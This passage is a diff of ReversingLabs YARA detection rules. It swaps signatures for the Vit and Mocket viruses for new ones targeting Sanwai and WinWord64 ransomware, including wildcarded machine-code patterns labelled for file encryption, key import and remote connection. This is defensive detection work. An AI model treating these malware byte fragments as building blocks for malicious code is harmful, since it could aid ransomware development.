+            ?? ?? ?? ?? 01 CA 8B 4C 24 ?? BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ??
+            48 8B 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 31 C0 48 81
+            C4 ?? ?? ?? ?? 5B 5D 5F 5E 41 5C 41 5D 41 5E 41 5F C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $awfull_body at pe.entry_point )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $generate_key ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Linux_Virus_Vit : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Sanwai : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Vit virus."
+		description = "Yara rule that detects Sanwai ransomware."
 		author = "ReversingLabs"
-		id = "4515fe43-4c5a-521d-82b7-273823f0c64e"
-		date = "2026-02-22"
-		date = "2026-02-22"
-		modified = "2023-06-07"
+		id = "01912621-4a34-5e34-8542-5b561e8da567"
+		date = "2021-11-11"
+		modified = "2021-11-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Linux.Virus.Vit.yara#L3-L36"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sanwai.yara#L1-L71"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2fba7a081dfca85aee5c7f3b33414b799ed52ca6aa5bbf031da040aaa75acde9"
-		score = 40
+		logic_hash = "a7a95b2403fe539dce0d856cc1c04d15440677ea39c0a22e818b42333a64e92c"
+		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sanwai"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$vit_entry_point = {
-        55 89 E5 81 EC 40 31 00 00 57 56 50 53 51 52 C7 85 D8 CE FF FF 00 00 00 00 C7 85 D4
-        CE FF FF 00 00 00 00 C7 85 FC CF FF FF CA 08 00 00 C7 85 F8 CF FF FF B8 06 00 00 C7
-        85 F4 CF FF FF AD 08 00 00 C7 85 F0 CF FF FF 50 06 00 00 6A 00 6A 00 8B 45 08 50 E8
-        18 FA FF FF 89 C6 83 C4 0C 85 F6 0F 8C E6 01 00 00 6A 00 68 ?? ?? ?? ?? 56 E8 2E FA
-        FF FF 83 C4 0C 85 C0 0F 8C C4 01 00 00 8B 85 FC CF FF FF 50 8D 85 00 D0 FF FF 50 56
-        E8 2A FA FF FF 89 C2 8B 85 FC CF FF FF 83 C4 0C 39 C2 0F 85 9D 01 00 00 56 E8 E1 F9
-        FF FF BE FF FF FF FF 6A 00 6A 00 E9
-      }
-		$vit_str = "vi324.tmp"
+		$find_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
+            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 55 ?? 8B D9 83 7B ?? ?? 8B F3 8B 45 ?? 8B 7D
+            ?? 89 45 ?? 72 ?? 8B 33 8D 4E ?? 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 0F 84
+            ?? ?? ?? ?? 3B 73 ?? 0F 85 ?? ?? ?? ?? 88 45 ?? 8D 55 ?? FF 75 ?? 8D 4D ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? C7 45 ?? ?? ?? ??
+            ?? 50 8B CB E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B
+            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ??
+            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7B ?? ?? 72 ?? 8B 1B 8B 75 ?? 57 56 53 E8
+            ?? ?? ?? ?? 85 C0 75 ?? 8B 36 8B CF E8 ?? ?? ?? ?? 84 C0 74 ?? 57 56 E8 ?? ?? ?? ??
+            85 C0 75 ?? 8B CF E8 ?? ?? ?? ?? 84 C0 75 ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59
+            5F 5E 5B 8B E5 5D C3 83 F8 ?? 75 ?? 8B 4D ?? D1 E9 F6 C1 ?? B9 ?? ?? ?? ?? 0F 45 C1
+            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3 B8 ?? ?? ?? ?? 8B 4D ?? 64 89
+            0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3
+        }
+		$import_key = {
+            8D 44 24 ?? 50 6A ?? 6A ?? 6A ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 5E 85
+            C0 75 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 32 C0 5F 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ??
+            83 C4 ?? C3 8B 44 24 ?? FF 74 24 ?? 8B 08 8B 40 ?? 89 47 ?? 8D 44 24 ?? 50 57 6A ??
+            6A ?? 6A ?? FF 74 24 ?? 89 0F FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ??
+            FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? B0 ?? 5F 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3
+        }
+		$encrypt_files = {
+            8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 73 ?? 8A 01 3A 02 75 ?? 83 FE ?? 74 ??
+            8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 33 C0 EB ??
+            1B C0 83 C8 ?? 85 C0 75 ?? 8B 5D ?? 8B 7D ?? C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
+            BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B CF E8 ?? ?? ?? ?? 51 C6 45 ?? ?? 8D 4D ?? 8B
+            9D ?? ?? ?? ?? 51 83 CB ?? 8B C8 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 CB ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 83 CB ?? 83 7D ?? ?? 89 9D ?? ?? ?? ?? 0F 43 4D ?? 83
+            7D ?? ?? 89 9D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 01 3B
+            02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 73 ?? 8A 01 3A 02 75 ?? 83 FE ?? 74 ?? 8A 41 ??
+            3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 33 C0 EB ?? 1B C0 83
+            C8 ?? 85 C0 75 ?? 8B 5D ?? 8B 7D ?? C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 8B
+            CF 50 E8 ?? ?? ?? ?? 51 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 51 83 CB ?? 8B C8 89 9D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 8D 4D ?? 81 CB ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B 5D ??
+            83 FB ?? 0F 43 CF 83 7D ?? ?? 0F 85
+        }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and $vit_entry_point at elf.entry_point and $vit_str
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $import_key ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Win32_Virus_Mocket : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Winword64 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Mocket virus."
+		description = "Yara rule that detects WinWord64 ransomware."
 		author = "ReversingLabs"
-		id = "878c2162-9a79-52e6-af7b-95f9667f9e78"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "a5f7967d-58f4-5fdd-b67f-5f5dbfec0f4b"
+		date = "2021-02-11"
+		modified = "2021-02-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.Mocket.yara#L3-L58"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.WinWord64.yara#L1-L215"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "af16974396efe7a1a46aa39b812482dcc49d0fe95db6640c1703db479e7ea9dc"
+		logic_hash = "73d8c4f1b3bed365320b26332f1f1b49404d8e6536f3e25042f5f64e5bc09bd4"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "Mocket"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WinWord64"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$mocket_body_1 = {
-            E8 00 00 00 00 5B 81 EB ?? ?? ?? ?? 8B 34 24 81 E6 00 00 FF FF E8 31 00 00 00 89 83 ?? ?? ?? ?? E8 4C 00 00 00 89 83 ??
-            ?? ?? ?? E8 A2 00 00 00 E8 CD 00 00 00 E8 05 01 00 00 87 CB E3 0C B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? FF E0 C3 66 81 3E 4D 5A
-            75 0E 8B 7E 3C 03 FE 66 81 3F 50 45 75 02 96 C3 81 EE 00 00 01 00 81 FE 00 00 00 70 73 DD 33 C0 C3 8B 70 3C 03 F0 8B 76
-            78 03 F0 56 8B 76 20 03 F0 8B C6 33 D2 33 C9 8A 8B ?? ?? ?? ?? 8D BB ?? ?? ?? ?? 8B 34 02 03 B3 ?? ?? ?? ?? 83 C2 04 F3
-            A6 75 E2 5E 8B C6 83 EA 04 D1 EA 8B 40 24 03 83 ?? ?? ?? ?? 33 C9 66 8B 0C 02 8B C6 8B 40 1C 03 83 ?? ?? ?? ?? C1 E1 02
-            8B 04 01 03 83 ?? ?? ?? ?? C3 8D BB ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 57 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 89 06
-            83 C6 04 B9 FF FF FF FF 32 C0 F2 AE 80 3F 90 75 DD C3 8D BB ?? ?? ?? ?? 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 81 C7
-            80 00 00 00 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 81 C7 80 00 00 00 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 C3 33
-            C9 B1 03 8D BB ?? ?? ?? ?? 57 8B 83 ?? ?? ?? ?? FF D0 E8 01 00 00 00 C3 C7 83 ?? ?? ?? ?? 00 00 00 00 8D 83 ?? ?? ?? ??
+		$remote_connection_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 33 DB 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ??
+            03 C1 89 9D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 51
+            50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 89 5D ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ??
+            ?? ?? ?? 53 0F 43 85 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ??
+            85 DB 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F 43 0D
+            ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 51 50 51
+            8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 50 53
+            FF 15 ?? ?? ?? ?? 8B 55 ?? 8B D8 89 9D ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55
+            ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
+            76 ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 66 89 45 ?? 85 DB 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9
         }
-		$mocket_body_2 = {
-            50 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 40 0B C0 74 53 48 89 83 ?? ?? ?? ?? E8 48 00 00 00 FE 83 ?? ?? ?? ?? 80
-            BB ?? ?? ?? ?? 0A 74 29 8D BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 32 C0 F3 AA 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? 50 8B 83 ??
-            ?? ?? ?? FF D0 0B C0 75 C3 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 C3 60 8D B3 ?? ?? ?? ?? 56 8B 83 ?? ?? ?? ?? FF
-            D0 89 83 ?? ?? ?? ?? 68 80 00 00 00 56 8B 83 ?? ?? ?? ?? FF D0 E8 B7 01 00 00 40 0B C0 0F 84 75 01 00 00 48 89 83 ?? ??
-            ?? ?? 8B 8B ?? ?? ?? ?? E8 B4 01 00 00 0B C0 0F 84 4D 01 00 00 89 83 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? E8 B4 01 00 00 0B C0
-            0F 84 26 01 00 00 89 83 ?? ?? ?? ?? 8B 70 3C 03 F0 66 81 3E 50 45 0F 85 F7 00 00 00 81 7E 4C 4B 43 4F 4D 0F 84 EA 00 00
-            00 8B 4E 3C 51 8B 46 28 89 83 ?? ?? ?? ?? 8B 46 34 89 83 ?? ?? ?? ?? FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ??
-            ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 59 8B 83 ?? ?? ?? ?? 05 ?? ?? ?? ?? E8 5C 01 00 00 89 83 ?? ?? ?? ?? 91 E8 21 01 00 00
-            40 0B C0 0F 84 B9 00 00 00 48 89 83 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? E8 1F 01 00 00 0B C0 0F 84 91 00 00 00 89 83 ?? ?? ??
+		$remote_connection_p2 = {
+            0F 43 0D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D BD ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F 43 BD ?? ?? ?? ?? 83
+            3D ?? ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F
+            43 0D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 57 53 FF 15 ?? ?? ??
+            ?? 8B 55 ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ??
+            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B 95 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ??
+            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ??
+            FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 45 ?? 0F 43 4D ?? 03 C1 83 7D ?? ?? 8D 4D
+            ?? 0F 43 4D ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 8D 4D ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ??
+            ?? ?? 83 3D ?? ?? ?? ?? ?? 8B 75 ?? 8B C6 0F 43 0D ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B
         }
-		$mocket_body_3 = {
-            ?? 8B 70 3C 03 F0 8B FE 83 C6 78 8B 57 74 C1 E2 03 03 F2 0F B7 47 06 48 6B C0 28 03 F0 8B 56 10 8B CA 03 56 14 52 8B C1
-            03 46 0C 89 47 28 8B 46 10 05 ?? ?? ?? ?? 8B 4F 3C E8 EA 00 00 00 89 46 10 89 46 08 8B 46 10 03 46 0C 89 47 50 81 4E 24
-            20 00 00 A0 C7 47 4C 4B 43 4F 4D 8D B3 ?? ?? ?? ?? 5A 87 FA 03 BB ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A4 EB 0B 8B 8B ?? ?? ??
-            ?? E8 41 00 00 00 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ??
-            8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 61 C3 33 C0 50 50 51 FF B3 ?? ??
-            ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 C3 33 C0 50 50 6A 03 50 6A 01 68 00 00 00 C0 56
-            8B 83 ?? ?? ?? ?? FF D0 C3 6A 00 51 6A 00 6A 04 6A 00 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 C3 51 6A 00 6A 00 6A
-            02 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 C3 33 D2 F7 F1 0B D2 74 01 40 F7 E1 C3
+		$remote_connection_p3 = {
+            55 ?? 2B C2 57 51 3B F8 77 ?? 8D 04 3A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34
+            10 56 E8 ?? ?? ?? ?? 83 C4 ?? C6 04 37 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5
+            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 75 ?? 8B C6
+            8B BD ?? ?? ?? ?? 0F 43 CF 8B 55 ?? 2B C2 8B 9D ?? ?? ?? ?? 53 51 3B D8 77 ?? 8D 04
+            1A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 10 56 E8 ?? ?? ?? ?? 83 C4 ?? C6 04
+            1E ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B BD
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? ?? ?? 83 3D ?? ??
+            ?? ?? ?? 8B 75 ?? 8B C6 0F 43 0D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 55 ?? 2B C2 53 51
+            3B D8 77 ?? 8D 04 1A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 10 56 E8 ?? ?? ??
+            ?? 83 C4 ?? C6 04 33 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 53 E8
+            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 45 ?? 0F 43
+            D3 8B 75 ?? 2B C6 8B 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 ??
+            8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 06 ??
+            EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 9D ?? ??
+            ?? ?? 83 3D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B
+        }
+		$remote_connection_p4 = {
+            45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45
+            ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30
+            ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B D0 83 78 ?? ?? 72 ?? 8B 10
+            8B 48 ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D
+            04 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4
+            ?? C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ??
+            ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ??
+            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? 83 3D
+            ?? ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D
+            ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03
+            F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ??
+            ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 55 ?? 8B 4D ?? 0F 43
+            55 ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04
+            0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ??
+            C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ??
+            83 3D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 45 ??
+            8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 31 89 45 ?? 8D
+        }
+		$remote_connection_p5 = {
+            45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 ?? EB
+            ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ??
+            ?? 85 F6 74 ?? 8B 45 ?? 8D 4D ?? 83 7D ?? ?? 6A ?? 0F 43 4D ?? 50 50 51 6A ?? FF B5
+            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ??
+            ?? ?? ?? 51 68 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 F6 8B 35 ??
+            ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 FF D6 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B
+            85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C6 45 ?? ?? 83 F8 ?? 72 ?? 8D 48 ?? 8B C3 81 F9 ?? ?? ?? ?? 72 ?? 8B 5B ?? 83 C1 ??
+            2B C3 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ??
+            ?? ?? 83 F8 ?? 72 ?? 8D 48 ?? 8B C7 81 F9 ?? ?? ?? ?? 72 ?? 8B 7F ?? 83 C1 ?? 2B C7
+        }
+		$remote_connection_p6 = {
+            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ??
+            72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
+            F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55
+            ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
+            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ??
+            42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52
